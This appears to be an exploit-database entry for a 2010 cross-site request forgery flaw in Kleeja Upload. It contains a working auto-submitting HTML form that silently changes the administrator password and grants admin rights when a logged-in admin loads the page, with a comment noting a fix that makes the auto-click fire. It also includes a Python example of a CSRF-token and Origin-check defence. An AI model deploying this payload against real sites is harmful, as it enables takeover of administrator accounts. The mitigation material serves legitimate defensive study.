Vendor: Kleeja Upload
By: KOLTN & KoLtN@HoTMaiL.CoM
CVSS: 8,8 (HIGH)
CWE: 352 (CSRF)
Product Name: Kleeja Upload
Affected Version From: all Version
Affected Version To: all Version
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

Kleeja Upload – CSRF Change Admin Password

This exploit changes the admin password of the Kleeja software through a CSRF attack. The attacker crafts a malicious HTML page containing a hidden, auto-submitting form whose fields hold the new admin credentials and whose action points at the admin user-management URL (admin.php?cp=users). When an administrator who is logged in to Kleeja loads that page, the browser submits the form with the admin's session cookies; because the endpoint does not validate a CSRF token, the password is changed and the attacker gains access to the admin panel.

Mitigation:

The application should include an unpredictable, session-bound CSRF token in its admin forms and verify it server-side on every state-changing request, rejecting any request that lacks a valid token.
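As an added illustration of that mitigation (example code, not Kleeja's own), the handler below models the admin.php?cp=users POST from the PoC with a session-bound synchronizer token plus an Origin check; the secret, session ids, origins and the replayed form are constructed values.

```python
# Added example, not Kleeja's code: CSRF defence for the admin user-edit POST.
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

SERVER_SECRET = b"constructed-secret-rotate-me"  # assumption: per-deployment secret
SITE_ORIGIN = "http://localhost"                 # origin of the PoC's action URL

def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session: nonce.HMAC(secret, session_id:nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"

def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep or not nonce:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)

def origin_allowed(headers: dict) -> bool:
    """Secondary check: Origin (or Referer as fallback) must match the site."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed: a state-changing request with no origin is refused
    p = urlparse(source)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN

def handle_users_post(session_id: str, headers: dict, form: dict) -> tuple:
    """Guarded user-edit POST: both checks must pass before ps_1/ad_1 are applied."""
    if not origin_allowed(headers):
        return 403, "rejected: cross-site origin"
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "rejected: missing or invalid CSRF token"
    return 200, f"updated user {form.get('nm_1')}"

# Constructed replay of the PoC form: no token, submitted from another origin.
POC_FORM = {"nm_1": "KoLtN", "ml_1": "KoLtN@hotmail.com", "ps_1": "123456", "ad_1": "on"}

if __name__ == "__main__":
    print(handle_users_post("sess-1", {"Origin": "http://attacker.example"}, POC_FORM))
    tok = issue_csrf_token("sess-1")
    print(handle_users_post("sess-1", {"Origin": SITE_ORIGIN}, {**POC_FORM, "csrf_token": tok}))
```

The replayed PoC form is refused on both the origin and the token check; only a same-origin request carrying a token issued for that same session reaches the update.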

Exploit-DB raw data:

# Exploit Title: Kleeja Upload - CSRF Change Admin Password
# Date: 11-08-2010
# Author: KOLTN & KoLtN@HoTMaiL.CoM
# Software Link: http://www.kleeja.com
# Software Download: http://www.kleeja.com/download/
# Type : CSRF
# Version: all Version
# Greetz to : Juba & Mushii
#####################Exploit Change Admin Password##########################
<html>
<body>
<!-- Auto-submitting form aimed at the Kleeja admin user-management page;
     it only has effect in a browser that already holds an admin session -->
<form method="post" action="http://localhost/kleeja/admin.php?cp=users&page=0">
<input type="text" name="nm_1" value="KoLtN"/>
<input type="text" name="ml_1" value="KoLtN@hotmail.com"/>
<input type="password" name="ps_1" value="123456"/>
<input name="ad_1" type="checkbox" checked="checked"/>
<input type="checkbox" name="del_1" value="1"/>
<!-- id added: the original button only had name="submit", so the
     getElementById lookup below found nothing and the form never fired -->
<input class="button2" id="submit" name="submit" type="submit"/>
<script>
document.getElementById('submit').click();
</script>
</form>
</body>
</html>
#####################Exploit Change Admin Password##########################

Ramadan Kareem !!